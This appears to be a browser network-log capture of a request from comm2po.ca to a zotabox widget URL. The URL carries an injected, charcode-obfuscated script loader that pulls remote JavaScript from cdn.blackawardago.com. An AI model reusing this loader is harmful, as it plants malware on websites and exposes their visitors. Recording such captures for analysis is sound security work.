static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 0 B URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Wed, 21 Sep 2022 04:23:39 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 74e006d55d7ab4ff-OSL
X-Firefox-Spdy: h2